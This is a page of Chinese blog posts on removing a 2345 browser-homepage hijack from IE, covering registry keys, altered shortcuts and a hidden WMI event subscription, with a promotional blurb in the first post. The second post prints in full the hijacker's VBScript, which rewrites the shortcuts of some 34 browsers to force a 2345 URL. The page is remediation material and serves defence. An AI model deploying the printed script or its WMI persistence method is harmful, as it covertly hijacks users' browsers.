精华内容
下载资源
问答
  • 前几天号主的电脑的指纹解锁功能突然不能用了,号主以为是驱动没更新...最后当我打开IE浏览器,居然发现IE浏览器被2345劫持了,无论怎么修改都无法恢复。经过各种的查询与排查,最后终于把它解决掉了,在这里写一下自己

    前几天号主的电脑的指纹解锁功能突然不能用了,号主以为是驱动没更新到最新版导致的,去官网下载最新的驱动都安装上了也是不行,后面找Dell客服两个小时也没有找到最终的问题,后面个人怀疑是因为号主研究虚拟化技术导致一些冲突从而指纹识别不能用了,最后一不做二不休直接重置了系统后就恢复了【建议大家把桌面文件属性修改为存到别的盘符,这样就算你重置了系统,桌面的资料都不会丢失。
    最后当我打开IE浏览器,居然发现IE浏览器被2345劫持了,无论怎么修改都无法恢复。经过各种的查询与排查,最后终于把它解决掉了,在这里写一下自己处理这个的一些办法,以供后续有浏览器主页被劫持的小伙伴借鉴。

    内容简介:

    我们在各种网站,浏览各种网页的情况如果缺少防护的话就会使得自己安装的一些软件受到不同程度的篡改,其中浏览器被篡改的情况最为严重。这种情况特别让人抓狂,尽管自己并没有下载一些什么流氓软件,但是主页还是被硬生生地劫持了。每次点开后的主页是2345等这样的链接,紧接着它会跳向这个链接。
    IIS7网站监控工具可以做到提前预防各类网站劫持、并且是免费在线查询、适用于各大站长、政府网站、学校、公司、医院等网站。他可以做到24小时定时监控、同时它可以让你知道网站是否被黑、被入侵、被改标题、被挂黑链、被劫持、被墙及DNS是否被污染等等功能、更是拥有独家检测网站真实的完全打开时间、让你作为站长能清楚的知道自己网站的健康情况!
    官方图在这里插入图片描述
    在这里插入图片描述

    官方地址:IIS7服务器管理工具
    一般情况下,浏览器主页被篡改的情况分为三种:

    1、注册表篡改IE浏览器

    2、浏览器快捷方式篡改(浏览器主页被恶意锁定)

    3、注册表篡改三方浏览器

    废话不多说,直接进入今天的正题:如何去解决掉它呢?

    解决办法:【以IE浏览器为例】

    首先我们需要去查看我们的电脑的本身的注册表是否有被修改:

    查看注册表信息有没有被修改,如没有被修改,则非此种类型,跳过此种方法。

    1、注册表查看

    以下部分内容来源:http://www.baiwanzhan.com/site/t128119/

    1)IE默认连接首页被修改

    受到更改的注册表项目为:

    本地:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page

    当前用户:
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

    通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“万花谷”就会将你的IE默认连接首页修改为“www.86722.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。

    解决办法:
    在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;展开注册表到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about:blank”即可;同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。

    退出注册表编辑器,重新启动计算机,一切OK了!

    特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。

    解决办法:
    运行注册表编辑器regedit.exe,然后依次展开
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\Program Files\registry.exe,最后从IE选项中重新设置起始页就好了。

    2)、篡改IE的默认页
    有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。

    解决办法:
    运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了,或者设置为IE的默认值。

    3)、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改回来。
    主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):
    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Pan
    el]\“Settings\”=dword:1
    [HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Control Panel]\“Links\”=dword:1
    [HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Control Panel]\“SecAddSites\”=dword:1

    解决办法:
    将上面这些DWORD值改为“0”即可恢复功能。

    4)、IE的默认首页灰色按扭不可选
    这是由于注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改为“ 1”(即为灰色不可选状态)。

    解决办法:
    将“homepage”的键值改为“0”或者删除这个项即可。

    2、exe程序快捷方式查看

    此种则是通过修改exe程序的快捷方式来实现锁定主页的,我们可以通过Everything软件查找电脑里存在的exe程序的快捷方式的位置,然后去定位查看是够被修改。
    当然,我们也可以在桌面快捷方式鼠标右键查看属性,之后也可以定位此程序所处位置,然后观察其快捷方式属性是否被修改过。
    看这里是否修改为浏览器劫持的主页,如果有,把后面链接删除或者修改为你需要设置的主页(注意链接前面有一个空格,格式:后接一个空格键,然后再输入需要设置的主页链接),比如号主设置的默认是搜狗:https://www.sogou.com/

    这样也可以间接的锁定你的主页,从而达到劫持主页的目的。当然你设置为你需要的主页后,再次点击打开后就会是你需要设置的主页了。当然建议修改属性时请把原来位置以及程序所在位置的快捷方式删除,然后自己重新创建程序快捷方式,这样比较稳妥!

    这种劫持主页还算是轻度的了,还有比这更厉害的,请看下面。

    3、WMI主页劫持

    以下内容来源:懒得勤快博客:https://masuit.com/1328

    中国特色的流氓软件,让我们防不胜防,有时候我们就算再小心,也会有翻车的时候,一不小心就被劫持了所有浏览器的首页,怎么改都无济于事,无奈之下就只有重装系统来解决了,这不,博主(懒得勤快)最近也翻车了,被2345劫持了首页,又不想装系统,于是到处寻找解决方案,终于找到了这个工具来解决这个问题,现在这些流氓软件商的手段可真的是丧心病狂啊。

    WMI 是什么,它能帮我做什么?

    Windows 管理规范(Windows Management Instrumentation)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本地和远程计算机。WMI 通过编程和脚本语言为日常管理提供了一条连续一致的途径。例如,用户可以:

    (1)在远程计算机器上启动一个进程。

    (2)设定一个在特定日期和时间运行的进程。

    (3)远程启动计算机。

    (4)获得本地或远程计算机的已安装程序列表。

    (5)查询本地或远程计算机的 Windows 事件日志

    WMI主页劫持

    WMI主页劫持非常隐蔽,一般的方法很难找到罪魁祸首,没有运行进程,后台定时运行,即使手动修改回来,过一段时间所有的浏览器快捷方式都添加了推广主页链接。

    WMI主页劫持方法:

    使用WMITools处理:

    WMITools工具:https://590m.com/file/21430834-461799233

    安装WMITools后,右键WMI Event Viewer,管理员运行,点击钢笔图标一直确认
    在右侧选中后右击 -> 选择view instant properties
    查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上2345的网址(总算把你揪出来了,藏得够深的)

    受到影响的浏览器基本涵盖了市面上现有的所有浏览器(30余款),如下:

    “114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe”

    最后,右键__EventFilter,选择Delete instance
    后面号主发现这个好像不太全,补上:

    安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”,确定
    点击左侧_EventFilter:Name=“unown_filter”,再至右侧右键点击ActiveScriptEventConsumer Name=“unown”,选择view instant properties,
    最后,右键__EventFilter,选择Delete instance
    4、其他方法

    号主当时搜了不少办法,有说使用360等工具去锁定主页从而防止主页被篡改的发生,其实吧,在号主看来,这无非就是是用一个无赖赶走了一个流氓,从根本上根本解决不了问题,嗯,就说这么多,大家应该都懂~~后面会给你一大堆惊喜的。

    号主此次被劫持的号主以上方法都看了,很不幸,都不是,后面用exe解析程序直接查看IE的主程序,貌似瞥见了一丝2345的影子,大概是修改了这里吧,也有大致可能修改了dll文件。最后我直接将IE浏览器重新卸载功能再重新安装就解决了主页被劫持的问题。

    大致给大家描述一下被劫持的现象:

    1)打开浏览器自动跳转2345导航,主页跟着一堆广告~~

    通过Internet选项修改锁定主页无法锁定,即使点了确认以后再次回来还是锁定的2345,注册表看了没有被修改,WMI也看了没有相应的脚本。
    解决办法:

    卸载IE浏览器之后再重新安装,请注意这里是卸载,而不是重新覆盖安装,即使你有IE安装包,覆盖安装是解决不了的。其他浏览器也是如此,建议卸载后再安装,IE是系统自带,卸载并不是普通的卸载方法。建议如果是其他的浏览器的话,建议用Uninstall Tools之类的去卸载比较完全,可以达到不残留。

    IE浏览器卸载方法:

    打开控制器面板:
    win+r : 输入control,Enter即可
    或者右键桌面电脑图标,退回控制面板即可。
    亦或者桌面右键,个性化——主题——桌面图标管理添加即可:之后,会提示重启电脑,确认即可,最后我们再按同样的方法将IE浏览器安装回来即可恢复,号主的劫持问题是如此解决的。
    本篇文章仅是整理、如有侵权联系删除

    展开全文
  • 前几天号主的电脑的指纹解锁功能突然不能用了,号主以为是驱动没更新到最新版导致的,去官网下载最新的驱动都安装上了也是不行,后面找Dell客服两个小时也没有找到最终的问题,后面个人...最后当我打开IE浏览器,...

    1f4f013c77d65e4ed80ed8889891e72f.gif

    818b75e00963e605726d594bd582a6c9.png

    前几天号主的电脑的指纹解锁功能突然不能用了,号主以为是驱动没更新到最新版导致的,去官网下载最新的驱动都安装上了也是不行,后面找Dell客服两个小时也没有找到最终的问题,后面个人怀疑是因为号主研究虚拟化技术导致一些冲突从而指纹识别不能用了,最后一不做二不休直接重置了系统后就恢复了【建议大家把桌面文件属性修改为存到别的盘符,这样就算你重置了系统,桌面的资料都不会丢失。

    f364f6a5b2c3689810f93c27a773a364.png

    最后当我打开IE浏览器,居然发现IE浏览器被2345劫持了,无论怎么修改都无法恢复。经过各种的查询与排查,最后终于把它解决掉了,在这里写一下自己处理这个的一些办法,以供后续有浏览器主页被劫持的小伙伴借鉴。

    内容简介:

    我们在各种网站,浏览各种网页的情况如果缺少防护的话就会使得自己安装的一些软件受到不同程度的篡改,其中浏览器被篡改的情况最为严重。这种情况特别让人抓狂,尽管自己并没有下载一些什么流氓软件,但是主页还是被硬生生地劫持了。每次点开后的主页是2345等这样的链接,紧接着它会跳向这个链接。

    一般情况下,浏览器主页被篡改的情况分为三种:

    1、注册表篡改IE浏览器

    2、浏览器快捷方式篡改(浏览器主页被恶意锁定)

    3、注册表篡改三方浏览器

    废话不多说,直接进入今天的正题:如何去解决掉它呢?

    解决办法:【以IE浏览器为例】

    首先我们需要去查看我们的电脑的本身的注册表是否有被修改

    查看注册表信息有没有被修改,如没有被修改,则非此种类型,跳过此种方法

    1、注册表查看

    以下部分内容来源:http://www.baiwanzhan.com/site/t128119/


    1)IE默认连接首页被修改 

    受到更改的注册表项目为: 

    本地:

    HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page 

    当前用户:

    HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page 

    通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“万花谷”就会将你的IE默认连接首页修改为“www.86722.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。 

    解决办法: 

    在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;展开注册表到 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about:blank”即可;同理,展开注册表到HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main

    在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。 

    退出注册表编辑器,重新启动计算机,一切OK了!

    特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。

    解决办法: 

    运行注册表编辑器regedit.exe,然后依次展开 

    HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Current Version\\Run主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\\Program Files\\registry.exe,最后从IE选项中重新设置起始页就好了。

    2)、篡改IE的默认页 

    有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改: 

    HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。

    解决办法: 

    运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了,或者设置为IE的默认值。

    3)、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改回来。 

    主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选): 

    [HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Pan 

    el]\\\"Settings\\\"=dword:1 

    [HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\InternetExplorer\\Control Panel]\\\"Links\\\"=dword:1 

    [HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\InternetExplorer\\Control Panel]\\\"SecAddSites\\\"=dword:1 

    解决办法: 

    将上面这些DWORD值改为“0”即可恢复功能。

    4)、IE的默认首页灰色按扭不可选 

    这是由于注册表HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改为“ 1”(即为灰色不可选状态)。 

    解决办法: 

    将“homepage”的键值改为“0”或者删除这个项即可。

    以上部分内容来源:http://www.baiwanzhan.com/site/t128119/


    2、exe程序快捷方式查看

    此种则是通过修改exe程序的快捷方式来实现锁定主页的,我们可以通过Everything软件查找电脑里存在的exe程序的快捷方式的位置,然后去定位查看是够被修改。

    d5893258c1c27cef3b5c8f5008bf6a40.png

    b88ac9f93247bb540b679d592e1f2679.png

    当然,我们也可以在桌面快捷方式鼠标右键查看属性,之后也可以定位此程序所处位置,然后观察其快捷方式属性是否被修改过。

    c8ac761ad5d8c47185e1449a7ddf7647.png

    03344173a11116c86441f9942324430e.png

    看这里是否修改为浏览器劫持的主页,如果有,把后面链接删除或者修改为你需要设置的主页(注意链接前面有一个空格,格式:后接一个空格键,然后再输入需要设置的主页链接),比如号主设置的默认是搜狗:https://www.sogou.com/

    这样也可以间接的锁定你的主页,从而达到劫持主页的目的。当然你设置为你需要的主页后,再次点击打开后就会是你需要设置的主页了。当然建议修改属性时请把原来位置以及程序所在位置的快捷方式删除,然后自己重新创建程序快捷方式,这样比较稳妥!

    这种劫持主页还算是轻度的了,还有比这更厉害的,请看下面。

    3、WMI主页劫持

    以下内容来源:懒得勤快博客:https://masuit.com/1328


    中国特色的流氓软件,让我们防不胜防,有时候我们就算再小心,也会有翻车的时候,一不小心就被劫持了所有浏览器的首页,怎么改都无济于事,无奈之下就只有重装系统来解决了,这不,博主(懒得勤快)最近也翻车了,被2345劫持了首页,又不想装系统,于是到处寻找解决方案,终于找到了这个工具来解决这个问题,现在这些流氓软件商的手段可真的是丧心病狂啊。

    WMI 是什么,它能帮我做什么?

    Windows 管理规范(Windows Management Instrumentation)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本地和远程计算机。WMI 通过编程和脚本语言为日常管理提供了一条连续一致的途径。例如,用户可以:

    (1)在远程计算机器上启动一个进程。

    (2)设定一个在特定日期和时间运行的进程。

    (3)远程启动计算机。

    (4)获得本地或远程计算机的已安装程序列表。

    (5)查询本地或远程计算机的 Windows 事件日志

    WMI主页劫持

    WMI主页劫持非常隐蔽,一般的方法很难找到罪魁祸首,没有运行进程,后台定时运行,即使手动修改回来,过一段时间所有的浏览器快捷方式都添加了推广主页链接。

    WMI主页劫持方法:

    使用WMITools处理:

    WMITools工具:https://590m.com/file/21430834-461799233

    安装WMITools后,右键WMI Event Viewer,管理员运行,点击钢笔图标

    5b461250de1a8eb5a79455b8a2f40b13.png

    一直确认

    894649d2d7e51d0ffa7bcb74de65546d.png

    af25b6b6cb9c1a68278ab437d5fc29d8.png

    在右侧选中后右击 -> 选择view instant properties

    b0fc7ae58535e27c56ba285befd6d698.png

    On Error Resume Next:Const link = "http://www.2345.com/?v=1030":Const link360 = "http://www.2345.com/?v=1030&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

    查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上2345的网址(总算把你揪出来了,藏得够深的)

    受到影响的浏览器基本涵盖了市面上现有的所有浏览器(30余款),如下:

    "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

    最后,右键__EventFilter,选择Delete instance

    f341b1be582331da7ec7827e20e8c724.png

    ce489cc53b87f0b3988c3b0474d990e4.png

    后面号主发现这个好像不太全,补上:

    安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”,确定,出现下图:

    eb93ccda9f4eac97744fd55f5741fbb6.png

    点击左侧_EventFilter:Name=“unown_filter”,再至右侧右键点击ActiveScriptEventConsumer Name=“unown”,选择view instant properties,如下图:

    f5abcad1a0a675afd6653acb8a6cade2.png

    最后,右键__EventFilter,选择Delete instance


    以上内容来源懒得勤快博客https://masuit.com/1328

    4、其他方法

    号主当时搜了不少办法,有说使用360等工具去锁定主页从而防止主页被篡改的发生,其实吧,在号主看来,这无非就是是用一个无赖赶走了一个流氓,从根本上根本解决不了问题,嗯,就说这么多,大家应该都懂de468662b9ed33dc0d9a66708ae5c10c.png~~后面会给你一大堆惊喜的。

    号主此次被劫持的号主以上方法都看了,很不幸,都不是d4a285302890642c85026a0162fbc2b3.png,后面用exe解析程序直接查看IE的主程序,貌似瞥见了一丝2345的影子,大概是修改了这里吧,也有大致可能修改了dll文件。最后我直接将IE浏览器重新卸载功能再重新安装就解决了主页被劫持的问题。

    大致给大家描述一下被劫持的现象:

    1)打开浏览器自动跳转2345导航,主页跟着一堆广告~~365034f4d4a3616bda5d3e9f0dc4649f.png365034f4d4a3616bda5d3e9f0dc4649f.png

    2)通过Internet选项修改锁定主页无法锁定,即使点了确认以后再次回来还是锁定的2345,注册表看了没有被修改,WMI也看了没有相应的脚本。

    1e7155865e6bbb20de66c5c4f359a0b8.png

    解决办法:

    卸载IE浏览器之后再重新安装,请注意这里是卸载,而不是重新覆盖安装,即使你有IE安装包,覆盖安装是解决不了的。其他浏览器也是如此,建议卸载后再安装,IE是系统自带,卸载并不是普通的卸载方法。建议如果是其他的浏览器的话,建议用Uninstall Tools之类的去卸载比较完全,可以达到不残留。

    IE浏览器卸载方法:

    打开控制器面板:

    win+r : 输入control,Enter即可

    863285b4e5a46439bbc5d19fd3348a94.png

    或者右键桌面电脑图标,退回控制面板即可。

    d5faa36bdead07c7cb3e6368eea0820d.png

    亦或者桌面右键,个性化——主题——桌面图标管理添加即可:

    a9979cee31e62c16017d94e84b66f9d7.png

    5731640f135e7402a7bdc83993c2bf6a.png

    66835c993f7131281fbc6dac51d4d8ab.png

    3bca21e036b732328718e71300395ebd.png

    0d6570fbfebad136f2d08a3ebbbe98af.png

    之后,会提示重启电脑,确认即可,最后我们再按同样的方法将IE浏览器安装回来即可恢复,号主的劫持问题是如此解决的。

    注意:其他浏览器请勿覆盖安装,覆盖安装肯定是解决不了的。

    5、终极方法【重装系统】

    如果都解决不了的话,这也可能是最终能够处理的办法了。能接受重装系统的小伙伴可以采用此方法,重装系统前请先做好自己资料的备份,比如桌面文件以及C盘的下载文件夹下内容和QQ、微信等下载文件的备份。此外,建议重装系统使用系统自带系统【官方自带工具亦可】恢复进行重装,这样不会导致无法联网激活。

    推荐阅读此篇文章:

    C盘(系统盘)磁盘剩余容量告警?如何解决与预防,C盘容量告急解决方法简单汇总!

    如果接受不了重装系统,且以上办法都处理不了的话,建议使用以下方法:

    自行新建快捷方式,修改属性。前面有介绍过:

    27e3ca8661f453402cd79c73ffb4f1b1.png

    920f9a4b92e1d550dfb514a41706f539.png

    8391ff3295e1507ba776810c54f9e55f.png

    2f4b2392dea0d84705d21572a3ea368b.png

    最后,我们可以给劫持的主页网址添加黑名单

    2fcd790ebf312908841693b5885ea8a3.png

    b6b4958ca4da1ae2eadd1409fcf826bd.png

    9ce9562b6271d4a29cf0994a4809be47.png

    以上内容就是今天内容,希望小伙伴们遇到都可以找到原因并处理掉,是什么具体导致被劫持的还需要大家自行排查确定

    欢迎大家加入FreeRoninQQ交流群点击→加入组织。点击在看转发就是对我最大的支持!!

    f6d74b14518c6cc5dd21819d2df49374.gif

    cfd19b8a213a042c4bc5f3669e106edf.png

    展开全文
  • 针对IE浏览器主页被2345劫持的问题

    万次阅读 2018-03-25 01:34:27
    每次打开IE浏览器都先打开http://www.666888119.com/这个网页, 然后转到https://www.2345.com页面 非常的恼火。问了度娘:开始菜单->运行->regedit->确定,打开注册表编辑工具,按顺序依次...

    每次打开IE浏览器都先打开http://www.666888119.com/这个网页,

    然后转到https://www.2345.com页面

     

    非常的恼火。

    问了度娘:

    开始菜单>运行->regedit->确定,打开注册表编辑工具,按顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main 分支,找到Default_Page_URL键值名(用来设置默认主页),在右窗口点击右键进行修改即可。

    但我发现这个Default_Page_URL的内容,并不是上面的两个页面:

     

    按照上面步骤完成后,依然没有效果,琢磨半天后发现一个很好玩的东西,就是可以通过注册表编辑器,可以把注册的信息导出来。第一次只导这个目录下的HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main,导出来没有找到想要的

    这里注意点,你点那个目录就导那个目录下的注册信息:如上面的

    点了Main后,然后点文件->导出,然后就点击保持的文件即可,然后用文本编辑就可以打开。

     

    通过上面的步骤,导出来还是没有搜索到上面两个网页的地址。然后在试试导出HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer的信息,然而还是没有。索性把所有的注册信息全部导出来看看

     

    导出来后发现查询,原来这个是在startpage里面,

     

    "StartPage"="http://www.666888119.com"

    [HKEY_USERS\S-1-5-21-2772221157-3291300487-1186248051-500\Software\Microsoft\InternetExplorer\DOMStorage\666888119.com]

    [HKEY_USERS\S-1-5-21-2772221157-3291300487-1186248051-500\Software\Microsoft\InternetExplorer\DOMStorage\www.666888119.com]

    "StartPage"="http://www.666888119.com"

     

    并且在HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\InternetExplorer\MAIN[HKEY_USERS\S-1-5-21-2772221157-3291300487-1186248051-500\Software\Microsoft\InternetExplorer\Main]下面

    找到之后,修改成自己想要的主页即可

    
    展开全文
  • 不知道你们有没有体验过,我反正是经历过的,今天去下载了个SQL管理软件 SQLyog破解版,直接来个无法删除的ie图标,并且被劫持成如下图片的样子。 再次,我只想说,注意一下这个人网名叫shel_lee,现在已经改名。...

    前言:有没有经历过被2345支配的恐惧

    不知道你们有没有体验过,我反正是经历过的,今天去下载了个SQL管理软件 SQLyog破解版,直接来个无法删除的ie图标,并且被劫持成如下图片的样子。
    在这里插入图片描述

    再次,我只想说,注意一下这个人网名叫shel_lee,现在已经改名。如果想知道进一步了解,可以百度搜索shel_lee可以看到这个人的csdn,里面全是SQLyog破解版,评论的人深受其害,我也是个受害者。

    奉劝这位仁兄,作恶没有好下场,请拾起你的良知。

    也不知道如何举报这位这种资源,有看到的请帮忙@官方CSDN,谢谢大家!

    具体信息看这条帖子:https://tieba.baidu.com/p/5160323499?red_tag=1898624225


    正文:解决方法开始

    直接用百度经验这条方法解决
    https://baijiahao.baidu.com/s?id=1614007322811723560&wfr=spider&for=pc

    1. 在注册表编辑器窗口中定位到计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace注册表项;

    2. 在查找目标窗口中输入Internet Explorer,然后点击“查找下一个”按钮;

    3. 这时就会找到IE浏览器的注册表项了,右键点击该注册表项,在弹出菜单中选择“删除”菜单项;

    4. 再全局搜索一下2345这个值,有的话直接全部删除


    附上2345的注册表位置的图片

    是不不是有的点小激动!
    看到直接右键删除就可以了在这里插入图片描述

    展开全文
  • 解决IE浏览器被2345劫持问题

    千次阅读 2020-10-20 10:07:53
    由于原系统浏览器主页被2345劫持,经过多种方式努力后仍没有解决,无奈只能重新装机。没想到,重装系统后,浏览器主页仍然被2345劫持。又愤怒又无奈之下,只能自己深夜上阵,和它死磕,没想到居然彻底解决了(可怜...
  • 该木马的主要危害是进行主页劫持劫持的网址列表从云端配置文件获取。但由于每次开机启动都会进行自更新,不排除后期拉取其他恶意功能的代码执行,潜在危害较大。该木马近期活跃性上升,疑与电商购物节之前劫...
  • 一位网友说他的电脑中的360浏览器7322.com劫持,而IE浏览器6781.com劫持,桌面上的IE图标也无法删除。请偶帮忙解决。  通过QQ远程协助,右击网友电脑桌面上的IE图标,弹出的快捷菜单确实与正常的IE图标...
  • 关于主页被劫持的原因有很多,最常见的木马劫持,还有快捷方式添加参数那种网上很多,这里我说一下自己遇到的状况,这次是无论快捷方式,甚至原应用程序,甚至注册表,启动项,都找遍,都没有异常,但是启动浏览器...
  • IE浏览器被2345网址导航劫持

    千次阅读 2017-11-07 20:13:23
    使用IE时发现主页变成了2345网址导航。进行了各种设置,包括更改浏览器主页,更改注册表,最后不得不换浏览器。 最近发现魔方管理软件中有一个守护,里面有浏览器主页保护设置,修改之后,问题解决。 总结:遇到这...
  • 注册表里主页设置项和IE浏览器里internet选项都依然是自己原来设置的喜欢的主页网址,但打开IE,却是让人非常不舒服的hao123,一种劫持,一种人强迫,那种感觉极其不爽。现在也搞不懂要害环节在哪儿,总之,...
  • 近来一种劫持 IE 浏览器的病毒流行,该病毒会在桌面上建立多个假 IE 浏览器快捷... 瑞星公司特向广大网友提供了专杀工具,以帮助广大网友快速有效解决 IE 首页篡、桌面 IE 图标篡改的问题。瑞星官方发布解决方案:
  • 通常会发生这样的问题,是由于IE浏览器的首页注册表键值恶意网站修改了,现在可以通过微软发布的“Microsoft Fix it”修复程序来进行修复;如果执行 Microsoft Fix it 修复程序并且重新开机之后,问题还是存在,则...
  •  近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就直接跳转到 ...最后发现,原来快速启动栏的IE浏览器快捷命令其修改,修改后的类似如下图,于是
  • 3.IE搜索栏搜狗劫持主页也没法改  4.为什么装搜狗输入法后在IE中输入某些网址时进入搜狗搜索页面呢?  解决办法  开始》→运行→输入regedit→找到HKEY_CURRENT_USER\Software\Microsoft\Internet ...
